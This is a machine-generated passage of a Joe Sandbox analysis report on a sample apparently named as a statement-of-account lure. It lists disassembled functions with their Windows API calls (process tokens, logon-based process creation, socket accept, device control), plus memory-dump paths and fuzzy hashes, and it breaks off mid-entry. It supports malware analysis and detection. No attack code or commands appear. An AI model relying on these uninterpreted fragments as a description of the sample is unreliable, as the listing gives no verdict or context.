                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: e02a04c5756c655d1f49ca4d7e26116cdc4e8a5d2a71d777ac72f69ace301d97
                                      • Instruction ID: a796354bec3f49a7f75641ac6aa87d111b902aa2f67f1136315ef8092f28b7c2
                                      • Opcode Fuzzy Hash: e02a04c5756c655d1f49ca4d7e26116cdc4e8a5d2a71d777ac72f69ace301d97
                                      • Instruction Fuzzy Hash: BB21D171205606BBEB15AF60DE40FBBB7ADFF84710F10411BBA1596750EB719820AB90
                                      Function 0096AF64 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0096AFAE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0096AFB5
                                      • CloseHandle.KERNEL32(00000004), ref: 0096AFCF
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096AFFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 2621361867-0
                                      • Opcode ID: 21f255dbf1af808771f58e42cb31d36d1e1f8447d774bfe5a0dce07e5d9879a4
                                      • Instruction ID: f689628812f32b64cd94d650d433927f5286ce7d5919f9180c4b85f2467c295a
                                      • Opcode Fuzzy Hash: 21f255dbf1af808771f58e42cb31d36d1e1f8447d774bfe5a0dce07e5d9879a4
                                      • Instruction Fuzzy Hash: DA214CB2105209ABDF029F94EE49BEE7BA9AF44314F044125FA01A2161D37ADD61EB62
                                      Function 00998A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00998AA6
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00998AC0
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00998ACE
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00998ADC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 1f01df78051a24c8168c428bfe8e1a714c30313d0293f9a7d3b9f07a1a180d82
                                      • Instruction ID: ea88453023afe3811a6eb7c13240e55d908b0b1eddcad0fe252a4e1591c7bcfa
                                      • Opcode Fuzzy Hash: 1f01df78051a24c8168c428bfe8e1a714c30313d0293f9a7d3b9f07a1a180d82
                                      • Instruction Fuzzy Hash: 4C119031206115AFDB04AB18DC55FBB779DBF86320F144619F92AC72E2DB74AD018B94
                                      Function 00988A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00988AE0
                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00988AF2
                                      • accept.WS2_32(00000000,00000000,00000000), ref: 00988AFF
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988B16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: a8a02894549d5e50c91dd1927598828dc5a0d329b8e4c6c14894d59728a1e292
                                      • Instruction ID: 31f70a7d83028f2a2448e923ec56f8db77f7d0a571d5f96ad1ae72b8c7875ae3
                                      • Opcode Fuzzy Hash: a8a02894549d5e50c91dd1927598828dc5a0d329b8e4c6c14894d59728a1e292
                                      • Instruction Fuzzy Hash: 97219672A011249FC7119F69C985ADEBBECEF89320F0041AAF849D7250DB749A418FA0
                                      Function 00970AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00971E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?), ref: 00971E77
                                        • Part of subcall function 00971E68: lstrcpyW.KERNEL32(00000000,?,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00971E9D
                                        • Part of subcall function 00971E68: lstrcmpiW.KERNEL32(00000000,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?), ref: 00971ECE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970AD4
                                      • lstrcpyW.KERNEL32(00000000,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970AFA
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 99b94d8a6103ace16b9debdea597603eb50f7bc9f29a56e28458f42932f5f685
                                      • Instruction ID: 9aa223827898cb2d2fbe5de01860967f5b01923a7a6a06a80fef4afce8fc4ab0
                                      • Opcode Fuzzy Hash: 99b94d8a6103ace16b9debdea597603eb50f7bc9f29a56e28458f42932f5f685
                                      • Instruction Fuzzy Hash: FF118137210305EFDB25AF64DC45E7A77A8FF85354B80816AE80ACB290EB719950D7A1
                                      Function 00962F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00962FB5
                                        • Part of subcall function 0095395C: __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 0095395C: __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095395C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: b897c8ab529bcf9339f68d20c8732dd0ed6fadd42b2e019c8803657f081d9f22
                                      • Instruction ID: 065f671174b4356648c818279f0dd216343475992270376bd734474fcef92945
                                      • Opcode Fuzzy Hash: b897c8ab529bcf9339f68d20c8732dd0ed6fadd42b2e019c8803657f081d9f22
                                      • Instruction Fuzzy Hash: 3C11CA31509612ABDB317FB1EC0576E7B9CAF843A1F208925FC899A152DB34C9449790
                                      Function 0097058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009705AC
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009705C7
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009705DD
                                      • FreeLibrary.KERNEL32(?), ref: 00970632
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                      • String ID:
                                      • API String ID: 3137044355-0
                                      • Opcode ID: bc2e1d0fdb8dae142284767c7fdb28b0e7b43033b92f5f0fcdea4d329cc8ae07
                                      • Instruction ID: e2b79dcbe441f7f56dd1db6eaecfebdd6bdec551fc146ca797f3d08289422662
                                      • Opcode Fuzzy Hash: bc2e1d0fdb8dae142284767c7fdb28b0e7b43033b92f5f0fcdea4d329cc8ae07
                                      • Instruction Fuzzy Hash: 6B218172A01209EFDB208F95DD98ADABBBCEFC0704F00CA69E51E92050E774EA55DF50
                                      Function 00976713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00976733
                                      • _memset.LIBCMT ref: 00976754
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009767A6
                                      • CloseHandle.KERNEL32(00000000), ref: 009767AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 76261c8aeb3c96eace09f7b65f459f017602a104db769d22b8f38941e17bcfc3
                                      • Instruction ID: 3a45f21b7ee0bc6b717483e5b54409eb93f191c12a49f3b3b80c77ab11d4ad44
                                      • Opcode Fuzzy Hash: 76261c8aeb3c96eace09f7b65f459f017602a104db769d22b8f38941e17bcfc3
                                      • Instruction Fuzzy Hash: 6D11CA769013287AE72097A5AC4DFAFBABCEF44774F10429AF508E71D0D2744E808BA4
                                      Function 0096B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0096AA79
                                        • Part of subcall function 0096AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0096AA83
                                        • Part of subcall function 0096AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0096AA92
                                        • Part of subcall function 0096AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0096AA99
                                        • Part of subcall function 0096AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096AAAF
                                      • GetLengthSid.ADVAPI32(?,00000000,0096ADE4,?,?), ref: 0096B21B
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0096B227
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096B22E
                                      • CopySid.ADVAPI32(?,00000000,?), ref: 0096B247
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                      • String ID:
                                      • API String ID: 259861997-0
                                      • Opcode ID: 7f39699aa1cf538aeb45eecb2efbd71840850b4d3d96a10e62a3dad90a6f36de
                                      • Instruction ID: 7498b0ecaf1e8ecbb5a6457b6ede5024205e9284a2d46b824e05be3d05d5e983
                                      • Opcode Fuzzy Hash: 7f39699aa1cf538aeb45eecb2efbd71840850b4d3d96a10e62a3dad90a6f36de
                                      • Instruction Fuzzy Hash: 5511C172A00205EFCB149F98DD95AAEB7EDFF94318F14802DE952E7210E731AE84DB10
                                      Function 0096B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0096B498
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4AA
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4C0
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 519f16760d3cd5220a59614a8991d0fdf56726f371387e464b6d475da668b6f0
                                      • Instruction ID: 702332d9c972d921165f1e4619abf3ff50bae4a0ed7f201fb8ad5e5177c1c637
                                      • Opcode Fuzzy Hash: 519f16760d3cd5220a59614a8991d0fdf56726f371387e464b6d475da668b6f0
                                      • Instruction Fuzzy Hash: 5311487A900218FFDB11DFA8C981E9DBBB8FB48710F204091EA04B7290DB71AE51DB94
                                      Function 0097732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00977352
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00977385
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0097739B
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009773A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: f673d315f440062d40248e885cb9a699b181b2fc57f13e4ddfbf03422fbc79f6
                                      • Instruction ID: 191eebb10305dd45ac96b0258b0ecf2d13f4406277ce9de0874f2fb77e013ac6
                                      • Opcode Fuzzy Hash: f673d315f440062d40248e885cb9a699b181b2fc57f13e4ddfbf03422fbc79f6
                                      • Instruction Fuzzy Hash: 30110872A2C204BFC7019BACDC05AEEBBAD9B45324F048315F935D3261E6748D00A7A0
                                      Function 0094D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                      • GetStockObject.GDI32(00000011), ref: 0094D1CE
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: 716f97914950872761cb3e39ce2611f27ce946a579336816c16d1ad1656dace8
                                      • Instruction ID: e39f4e445c07b866e38d1c29cd134f4ac00753ceeccde7f0feb623432876665f
                                      • Opcode Fuzzy Hash: 716f97914950872761cb3e39ce2611f27ce946a579336816c16d1ad1656dace8
                                      • Instruction Fuzzy Hash: 3011ADB250A509BFEF0A4F909C50EEABB6DFF08364F040216FE1452050DB319C60EBA0
                                      Function 00964DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                      • Instruction ID: ab6138ce22543f597623d313d7790ae4d0dacc5b1f93e2c9564e0dc333087662
                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                      • Instruction Fuzzy Hash: CC01443200014ABBCF175EC8DC168EE3F26BB58390F598855FA2859131D337CAB2EB81
                                      Function 00957452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00957A0D: __getptd_noexit.LIBCMT ref: 00957A0E
                                      • __lock.LIBCMT ref: 0095748F
                                      • InterlockedDecrement.KERNEL32(?), ref: 009574AC
                                      • _free.LIBCMT ref: 009574BF
                                      • InterlockedIncrement.KERNEL32(016428F0), ref: 009574D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 2704283638-0
                                      • Opcode ID: a015f99b9fecbf005e6a1e0de41fc7e2c53372257a0ed1e45c8befdb36b58a7a
                                      • Instruction ID: a2dae6b3c519d8aa6effbb89b3e61e6510f3154739190e309b38606ad8ee629a
                                      • Opcode Fuzzy Hash: a015f99b9fecbf005e6a1e0de41fc7e2c53372257a0ed1e45c8befdb36b58a7a
                                      • Instruction Fuzzy Hash: 4C01003290A661ABC722EFA7B90931DFB65BF44B22F154005FC14672A0CB206E08DFC2
                                      Function 00957A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __lock.LIBCMT ref: 00957AD8
                                        • Part of subcall function 00957CF4: __mtinitlocknum.LIBCMT ref: 00957D06
                                        • Part of subcall function 00957CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00957D1F
                                      • InterlockedIncrement.KERNEL32(?), ref: 00957AE5
                                      • __lock.LIBCMT ref: 00957AF9
                                      • ___addlocaleref.LIBCMT ref: 00957B17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
